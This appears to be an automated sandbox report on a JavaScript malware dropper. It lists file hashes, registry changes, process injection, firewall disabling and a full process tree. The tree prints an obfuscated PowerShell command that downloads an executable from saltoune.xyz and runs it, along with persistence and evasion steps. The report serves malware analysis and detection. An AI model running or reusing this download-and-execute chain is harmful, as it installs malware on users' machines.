Analysis
-
max time kernel
298s -
max time network
300s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
28-06-2021 16:28
Static task
static1
Behavioral task
behavioral1
Sample
CFDI 1675442 76821.js
Resource
win7v20210408
General
-
Target
CFDI 1675442 76821.js
-
Size
34KB
-
MD5
fef5d85788af40d874612dab6910f000
-
SHA1
e0510f670e82ccfd1f6d74e925fbe170c7625846
-
SHA256
4faf4fbb399a98cf3eb551a943f42bec7195287b9cb1deb11e5bd32c25d53264
-
SHA512
d976685412bb31a22498294ad85672dca337a2f579c68771310713a2e3ac3a34a5f62885a48a1499ab743ad653072e737b517a2b6ae17c32b95b994c788762d2
Malware Config
Extracted
https://saltoune.xyz/pb/aa.exe
Signatures
-
Modifies firewall policy service 2 TTPs 4 IoCs
Processes:
explorer.exedescription ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid Process 13 3320 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 6 IoCs
Processes:
Tempkmt12.exeunpakedree.exexc829374091FD.exexc829374091FD.exea51a7aye13w3cg_1.execa5yyu7i79mo.exepid Process 1208 Tempkmt12.exe 2304 unpakedree.exe 3472 xc829374091FD.exe 4344 xc829374091FD.exe 2208 a51a7aye13w3cg_1.exe 4548 ca5yyu7i79mo.exe -
Sets file execution options in registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
explorer.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe -
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
explorer.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 2.09 = "C:\\ProgramData\\Google Updater 2.09\\a51a7aye13w3cg.exe" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 2.09 = "\"C:\\ProgramData\\Google Updater 2.09\\a51a7aye13w3cg.exe\"" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 2.09 = "\"C:\\ProgramData\\Google Updater 2.09\\a51a7aye13w3cg.exe\"" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce explorer.exe -
Processes:
xc829374091FD.execmd.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA xc829374091FD.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
explorer.exedescription ioc Process File opened for modification C:\ProgramData\Google Updater 2.09\desktop.ini explorer.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
cmd.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum cmd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 cmd.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
Processes:
xc829374091FD.exeexplorer.exepid Process 4344 xc829374091FD.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
xc829374091FD.exea51a7aye13w3cg_1.exedescription pid Process procid_target PID 3472 set thread context of 4344 3472 xc829374091FD.exe 96 PID 2208 set thread context of 0 2208 a51a7aye13w3cg_1.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
xc829374091FD.exeexplorer.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 xc829374091FD.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString xc829374091FD.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe -
Delays execution with timeout.exe 5 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid Process 4236 timeout.exe 1860 timeout.exe 2516 timeout.exe 3004 timeout.exe 4292 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
explorer.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid Process 4372 taskkill.exe 4404 taskkill.exe -
Modifies Internet Explorer Protected Mode 1 TTPs 4 IoCs
Processes:
explorer.exedescription ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe -
Modifies Internet Explorer Protected Mode Banner 1 TTPs 1 IoCs
Processes:
explorer.exedescription ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe -
Processes:
explorer.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main explorer.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\VersionManager explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\VersionManager\DownloadVersionList = "0" explorer.exe -
Modifies registry class 2 IoCs
Processes:
Tempkmt12.execmd.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings Tempkmt12.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings cmd.exe -
NTFS ADS 2 IoCs
Processes:
explorer.exedescription ioc Process File opened for modification C:\Users\Admin\AppData\Local\Temp\a51a7aye13w3cg_1.exe:14EDFC78 explorer.exe File created C:\Users\Admin\AppData\Local\Temp\a51a7aye13w3cg_1.exe:14EDFC78 explorer.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 59 IoCs
Processes:
powershell.exeexplorer.exepid Process 3320 powershell.exe 3320 powershell.exe 3320 powershell.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe 4612 explorer.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
ca5yyu7i79mo.exepid Process 4548 ca5yyu7i79mo.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
xc829374091FD.exeexplorer.exepid Process 4344 xc829374091FD.exe 4344 xc829374091FD.exe 4612 explorer.exe 4612 explorer.exe -
Suspicious use of AdjustPrivilegeToken 31 IoCs
Processes:
powershell.exetaskkill.exexc829374091FD.exetaskkill.exeexplorer.exedescription pid Process Token: SeDebugPrivilege 3320 powershell.exe Token: SeDebugPrivilege 4372 taskkill.exe Token: SeDebugPrivilege 4344 xc829374091FD.exe Token: SeRestorePrivilege 4344 xc829374091FD.exe Token: SeBackupPrivilege 4344 xc829374091FD.exe Token: SeLoadDriverPrivilege 4344 xc829374091FD.exe Token: SeCreatePagefilePrivilege 4344 xc829374091FD.exe Token: SeShutdownPrivilege 4344 xc829374091FD.exe Token: SeTakeOwnershipPrivilege 4344 xc829374091FD.exe Token: SeChangeNotifyPrivilege 4344 xc829374091FD.exe Token: SeCreateTokenPrivilege 4344 xc829374091FD.exe Token: SeMachineAccountPrivilege 4344 xc829374091FD.exe Token: SeSecurityPrivilege 4344 xc829374091FD.exe Token: SeAssignPrimaryTokenPrivilege 4344 xc829374091FD.exe Token: SeCreateGlobalPrivilege 4344 xc829374091FD.exe Token: 33 4344 xc829374091FD.exe Token: SeDebugPrivilege 4404 taskkill.exe Token: SeDebugPrivilege 4612 explorer.exe Token: SeRestorePrivilege 4612 explorer.exe Token: SeBackupPrivilege 4612 explorer.exe Token: SeLoadDriverPrivilege 4612 explorer.exe Token: SeCreatePagefilePrivilege 4612 explorer.exe Token: SeShutdownPrivilege 4612 explorer.exe Token: SeTakeOwnershipPrivilege 4612 explorer.exe Token: SeChangeNotifyPrivilege 4612 explorer.exe Token: SeCreateTokenPrivilege 4612 explorer.exe Token: SeMachineAccountPrivilege 4612 explorer.exe Token: SeSecurityPrivilege 4612 explorer.exe Token: SeAssignPrimaryTokenPrivilege 4612 explorer.exe Token: SeCreateGlobalPrivilege 4612 explorer.exe Token: 33 4612 explorer.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
ca5yyu7i79mo.exepid Process 4548 ca5yyu7i79mo.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
ca5yyu7i79mo.exepid Process 4548 ca5yyu7i79mo.exe 4548 ca5yyu7i79mo.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
wscript.execmd.exeTempkmt12.exeWScript.execmd.exeWScript.execmd.exexc829374091FD.exexc829374091FD.exeexplorer.exedescription pid Process procid_target PID 4648 wrote to memory of 4252 4648 wscript.exe 77 PID 4648 wrote to memory of 4252 4648 wscript.exe 77 PID 4252 wrote to memory of 3320 4252 cmd.exe 79 PID 4252 wrote to memory of 3320 4252 cmd.exe 79 PID 4252 wrote to memory of 1208 4252 cmd.exe 81 PID 4252 wrote to memory of 1208 4252 cmd.exe 81 PID 4252 wrote to memory of 1208 4252 cmd.exe 81 PID 1208 wrote to memory of 1220 1208 Tempkmt12.exe 82 PID 1208 wrote to memory of 1220 1208 Tempkmt12.exe 82 PID 1208 wrote to memory of 1220 1208 Tempkmt12.exe 82 PID 1220 wrote to memory of 1580 1220 WScript.exe 83 PID 1220 wrote to memory of 1580 1220 WScript.exe 83 PID 1220 wrote to memory of 1580 1220 WScript.exe 83 PID 1580 wrote to memory of 1860 1580 cmd.exe 85 PID 1580 wrote to memory of 1860 1580 cmd.exe 85 PID 1580 wrote to memory of 1860 1580 cmd.exe 85 PID 1580 wrote to memory of 1528 1580 cmd.exe 86 PID 1580 wrote to memory of 1528 1580 cmd.exe 86 PID 1580 wrote to memory of 1528 1580 cmd.exe 86 PID 1580 wrote to memory of 2304 1580 cmd.exe 87 PID 1580 wrote to memory of 2304 1580 cmd.exe 87 PID 1580 wrote to memory of 2304 1580 cmd.exe 87 PID 1580 wrote to memory of 2516 1580 cmd.exe 88 PID 1580 wrote to memory of 2516 1580 cmd.exe 88 PID 1580 wrote to memory of 2516 1580 cmd.exe 88 PID 1580 wrote to memory of 2704 1580 cmd.exe 89 PID 1580 wrote to memory of 2704 1580 cmd.exe 89 PID 1580 wrote to memory of 2704 1580 cmd.exe 89 PID 1580 wrote to memory of 3004 1580 cmd.exe 90 PID 1580 wrote to memory of 3004 1580 cmd.exe 90 PID 1580 wrote to memory of 3004 1580 cmd.exe 90 PID 2704 wrote to memory of 3180 2704 WScript.exe 91 PID 2704 wrote to memory of 3180 2704 WScript.exe 91 PID 2704 wrote to memory of 3180 2704 WScript.exe 91 PID 3180 wrote to memory of 4072 3180 cmd.exe 93 PID 3180 wrote to memory of 4072 3180 cmd.exe 93 PID 3180 wrote to memory of 4072 3180 cmd.exe 93 PID 3180 wrote to memory of 4292 3180 cmd.exe 94 PID 3180 wrote to memory of 4292 3180 cmd.exe 94 PID 3180 wrote to memory of 4292 3180 cmd.exe 94 PID 3180 wrote to memory of 3472 3180 cmd.exe 95 PID 3180 wrote to memory of 3472 3180 cmd.exe 95 PID 3180 wrote to memory of 3472 3180 cmd.exe 95 PID 3472 wrote to memory of 4344 3472 xc829374091FD.exe 96 PID 3472 wrote to memory of 4344 3472 xc829374091FD.exe 96 PID 3472 wrote to memory of 4344 3472 xc829374091FD.exe 96 PID 3472 wrote to memory of 4344 3472 xc829374091FD.exe 96 PID 3472 wrote to memory of 4344 3472 xc829374091FD.exe 96 PID 3180 wrote to memory of 4372 3180 cmd.exe 97 PID 3180 wrote to memory of 4372 3180 cmd.exe 97 PID 3180 wrote to memory of 4372 3180 cmd.exe 97 PID 3180 wrote to memory of 4404 3180 cmd.exe 99 PID 3180 wrote to memory of 4404 3180 cmd.exe 99 PID 3180 wrote to memory of 4404 3180 cmd.exe 99 PID 3180 wrote to memory of 4600 3180 cmd.exe 100 PID 3180 wrote to memory of 4600 3180 cmd.exe 100 PID 3180 wrote to memory of 4600 3180 cmd.exe 100 PID 3180 wrote to memory of 4236 3180 cmd.exe 101 PID 3180 wrote to memory of 4236 3180 cmd.exe 101 PID 3180 wrote to memory of 4236 3180 cmd.exe 101 PID 4344 wrote to memory of 4612 4344 xc829374091FD.exe 102 PID 4344 wrote to memory of 4612 4344 xc829374091FD.exe 102 PID 4344 wrote to memory of 4612 4344 xc829374091FD.exe 102 PID 4612 wrote to memory of 3180 4612 explorer.exe 91 -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid Process 4600 attrib.exe 4072 attrib.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\CFDI 1675442 76821.js1⤵
- Suspicious use of WriteProcessMemory
PID:4648 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://saltoune.xyz/pb/aa.exe','%temp%kmt12.exe'); & %temp%kmt12.exe & UMkKSOqCracTlJx2⤵
- Suspicious use of WriteProcessMemory
PID:4252 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://saltoune.xyz/pb/aa.exe','C:\Users\Admin\AppData\Local\Tempkmt12.exe');3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3320
-
-
C:\Users\Admin\AppData\Local\Tempkmt12.exeC:\Users\Admin\AppData\Local\Tempkmt12.exe3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1208 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\LMPupdate\set\435246.vbs"4⤵
- Suspicious use of WriteProcessMemory
PID:1220 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\LMPupdate\set\183.bat" "5⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\SysWOW64\timeout.exetimeout 06⤵
- Delays execution with timeout.exe
PID:1860
-
-
C:\Windows\SysWOW64\PING.EXEping dhgfg sgudy6⤵
- Runs ping.exe
PID:1528
-
-
C:\LMPupdate\set\unpakedree.exe"unpakedree.exe" e -p67dah9fasdd8kja8ds9h9sad 43939237cx.rar6⤵
- Executes dropped EXE
PID:2304
-
-
C:\Windows\SysWOW64\timeout.exetimeout 56⤵
- Delays execution with timeout.exe
PID:2516
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\LMPupdate\set\3980392CV.vbs"6⤵
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\LMPupdate\set\48551.bat" "7⤵
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of WriteProcessMemory
PID:3180 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\LMPupdate\set"8⤵
- Views/modifies file attributes
PID:4072
-
-
C:\Windows\SysWOW64\timeout.exetimeout 28⤵
- Delays execution with timeout.exe
PID:4292
-
-
C:\LMPupdate\set\xc829374091FD.exexc829374091FD.exe /start8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3472 -
C:\LMPupdate\set\xc829374091FD.exexc829374091FD.exe /start9⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4344 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe10⤵
- Modifies firewall policy service
- Checks BIOS information in registry
- Adds Run key to start application
- Drops desktop.ini file(s)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Users\Admin\AppData\Local\Temp\a51a7aye13w3cg_1.exe/suac11⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2208
-
-
C:\Users\Admin\AppData\Local\Temp\ca5yyu7i79mo.exe"C:\Users\Admin\AppData\Local\Temp\ca5yyu7i79mo.exe"11⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4548
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im unpakedree.exe8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4372
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im unpakedree.exe8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4404
-
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h "C:\LMPupdate\set\xc829374091FD.exe"8⤵
- Views/modifies file attributes
PID:4600
-
-
C:\Windows\SysWOW64\timeout.exetimeout 48⤵
- Delays execution with timeout.exe
PID:4236
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 66⤵
- Delays execution with timeout.exe
PID:3004
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
49d00501554543d18a49c5b93c4528f0
SHA17a73595e37fda30fb1554b9d8bfe8a855f803d0b
SHA25674560d7c92a3cb7c3782e59fb45bd5a9b1a77a619fad985c4d5bdd17a48c2735
SHA5129c6c296b4bd21de5d13dc56dc92eab363bbd982335858a09537a34f2394be5632d34e002dfa73e312f685f45126c3d5d497a3d7c4553c46bcf4b8c65c4178fb6
-
MD5
0c4747ed40d52d992d44951de476c21b
SHA124cc5271d1a379e0ebdd0814a1148ecd6e7c880a
SHA2563c01bb32fd4de8574e37cb8293e61d869b8f5bbec69f3cb882a17d5d285b3264
SHA5126e7a264c288c8939c5d8f482229c92915a9bef427b5b1b1df8d942ffded006feba548acfa08588327587f34928acb0912d6f464536f5beb8027b78def01cffe1
-
MD5
f6e0c73782e7a0768006b7be0fc4a1a1
SHA12a5dea82a47544d00bfa99563fb899a41fa7a1f7
SHA2568c968d170289989dcca0c9bb5f2381dd6e38c3cfb6a324e80dbb6e556e6c5317
SHA51289827dcd80d9b5c2eedf18996a882feda400036df0b9691fc30701265f11528b0ab312dc69246f56e0388f75d2fa394329f502f9f796cbec702cd1dbfa9f2703
-
MD5
ec8f0f76fe14a110317c3b5c71fce669
SHA1d41207a90b96b124630f3f8ad7f1657cd39a4dd2
SHA2561447333e356ed3c1c5183ebef48730c370429c40137c2255585a1d3ba2a37614
SHA5129e78bf61280430edbc2ed2c5869acc2cde3e92f236f2eabf83f715a0d6fbc3a79a420c94364cdf4863dd5ca68e4b0109eefb34f7571c5acdc14944eaebdf8b1f
-
MD5
397a93800d56a2308bffc872d4a08032
SHA16f5334d51195a521e8a03f0e05ac777b96c77bc4
SHA256efe3abcfde6e9846a99049a68e6a38d0bc42baa3ac1cf6f236c894abef0a7720
SHA5127fc7b6c8ffe640295085cab4e56ba4c3eea9738a2c9fa27d1032fd60bb3a638e93cd2522058b6212dd7237366510a83c7d1d9b3cbd5f9712852c72959ace53eb
-
MD5
397a93800d56a2308bffc872d4a08032
SHA16f5334d51195a521e8a03f0e05ac777b96c77bc4
SHA256efe3abcfde6e9846a99049a68e6a38d0bc42baa3ac1cf6f236c894abef0a7720
SHA5127fc7b6c8ffe640295085cab4e56ba4c3eea9738a2c9fa27d1032fd60bb3a638e93cd2522058b6212dd7237366510a83c7d1d9b3cbd5f9712852c72959ace53eb
-
MD5
a5a4cc669d306e9b25ae2202e1ccc565
SHA14e8e841ba4915641f989a061f092f95f9070d164
SHA2563da185d70e391a0449a2e86823e181ca35f5356306a856701ec92cfee639c705
SHA5125398c3722d4c6119d9a033558ca6fe0d57735b8259b4907cf1844ba2921e48ffad1ae9f1dcc760158857c6fb13572cb4dd897ee6f6c260efce247b2b793b0216
-
MD5
a8d1d7e6c60c73faf55d64e724e97aa7
SHA19c0e3ff55ede8ad1e3a3e0eb8ff9ab467469f687
SHA2565624eea08b241314b8bd13ee9429449c53085a6bb2bcc481655f1f28b4314122
SHA512237507eef8f19f0f99dc15d30d43ec202963e00cb735902ac7304eb6cc8f658ab9db2b7952b94f082441a020725002dbf103dfc919e29235c87430fa19942df1
-
MD5
a8d1d7e6c60c73faf55d64e724e97aa7
SHA19c0e3ff55ede8ad1e3a3e0eb8ff9ab467469f687
SHA2565624eea08b241314b8bd13ee9429449c53085a6bb2bcc481655f1f28b4314122
SHA512237507eef8f19f0f99dc15d30d43ec202963e00cb735902ac7304eb6cc8f658ab9db2b7952b94f082441a020725002dbf103dfc919e29235c87430fa19942df1
-
MD5
a8d1d7e6c60c73faf55d64e724e97aa7
SHA19c0e3ff55ede8ad1e3a3e0eb8ff9ab467469f687
SHA2565624eea08b241314b8bd13ee9429449c53085a6bb2bcc481655f1f28b4314122
SHA512237507eef8f19f0f99dc15d30d43ec202963e00cb735902ac7304eb6cc8f658ab9db2b7952b94f082441a020725002dbf103dfc919e29235c87430fa19942df1
-
MD5
a8d1d7e6c60c73faf55d64e724e97aa7
SHA19c0e3ff55ede8ad1e3a3e0eb8ff9ab467469f687
SHA2565624eea08b241314b8bd13ee9429449c53085a6bb2bcc481655f1f28b4314122
SHA512237507eef8f19f0f99dc15d30d43ec202963e00cb735902ac7304eb6cc8f658ab9db2b7952b94f082441a020725002dbf103dfc919e29235c87430fa19942df1
-
MD5
a8d1d7e6c60c73faf55d64e724e97aa7
SHA19c0e3ff55ede8ad1e3a3e0eb8ff9ab467469f687
SHA2565624eea08b241314b8bd13ee9429449c53085a6bb2bcc481655f1f28b4314122
SHA512237507eef8f19f0f99dc15d30d43ec202963e00cb735902ac7304eb6cc8f658ab9db2b7952b94f082441a020725002dbf103dfc919e29235c87430fa19942df1
-
MD5
5aad89d35ec7e782a1efc68441f98bcc
SHA11bc02754a29cf413a2a89b68f89b25df3066847e
SHA25635617cfc3e8cf02b91d59209fc1cd07c9c1bc4d639309d9ab0198cd60af05d29
SHA51225490392971c0268d55886827db9f4ac3c35baf0803baf3342c2186c4dfa4de8c891ec30b4afd1d40f900671a841057dd30161306fa8239030d11bc820d68ea7
-
MD5
5aad89d35ec7e782a1efc68441f98bcc
SHA11bc02754a29cf413a2a89b68f89b25df3066847e
SHA25635617cfc3e8cf02b91d59209fc1cd07c9c1bc4d639309d9ab0198cd60af05d29
SHA51225490392971c0268d55886827db9f4ac3c35baf0803baf3342c2186c4dfa4de8c891ec30b4afd1d40f900671a841057dd30161306fa8239030d11bc820d68ea7
-
MD5
808e34a763acd79d01eeb1f54b18a551
SHA1df3f6e0f29d9d65a2afc401ab6938044f24c5506
SHA25686aab09b278fe8e538d8cecd28f2d7a32fe413724d5ee52e2815a3267a988595
SHA5129638d841bbbb059f6c6be89f3664ce68b4749585a523a776e51b6d591c6ccb60b6df3aa34d25bf8df7521f883b7e31108da64c1112ff3fd369945acc0885a31c
-
MD5
808e34a763acd79d01eeb1f54b18a551
SHA1df3f6e0f29d9d65a2afc401ab6938044f24c5506
SHA25686aab09b278fe8e538d8cecd28f2d7a32fe413724d5ee52e2815a3267a988595
SHA5129638d841bbbb059f6c6be89f3664ce68b4749585a523a776e51b6d591c6ccb60b6df3aa34d25bf8df7521f883b7e31108da64c1112ff3fd369945acc0885a31c